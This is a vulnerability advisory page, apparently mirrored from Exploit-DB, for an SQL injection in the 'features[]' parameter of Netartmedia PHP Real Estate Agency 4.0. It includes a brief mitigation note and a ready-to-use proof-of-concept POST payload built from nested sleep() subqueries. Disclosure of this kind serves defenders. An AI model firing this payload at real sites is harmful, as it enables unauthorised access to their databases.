Netartmedia PHP Real Estate Agency 4.0 - SQL Injection

vendor:

PHP Real Estate Agency

by:

Ahmet Ümit BAYRAM

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Real Estate Agency

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: YES

Related CWE: N/A

CPE: a:netartmedia:php_real_estate_agency:4.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2019

Netartmedia PHP Real Estate Agency 4.0 – SQL Injection

PHP Real Estate Agency is vulnerable to SQL injection in the 'features[]' parameter of the 'index.php' page. An attacker can exploit this vulnerability to gain access to the underlying database and execute arbitrary SQL queries.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to ensure that user-supplied data is properly sanitized.

Source

Exploit-DB raw data:

# Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/propertyagency/
# Demo Site: https://www.phpscriptdemos.com/agency/
# Version: 4.0
# Tested on: Kali Linux
# CVE: N/A
# Description:PHP Real Estate Agency is a web software written in PHP
especially designed for real estate agencies to help create quickly
and launch their own websites with their listings and information on
it.
----- PoC SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: features[] (POST)
Payload: ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1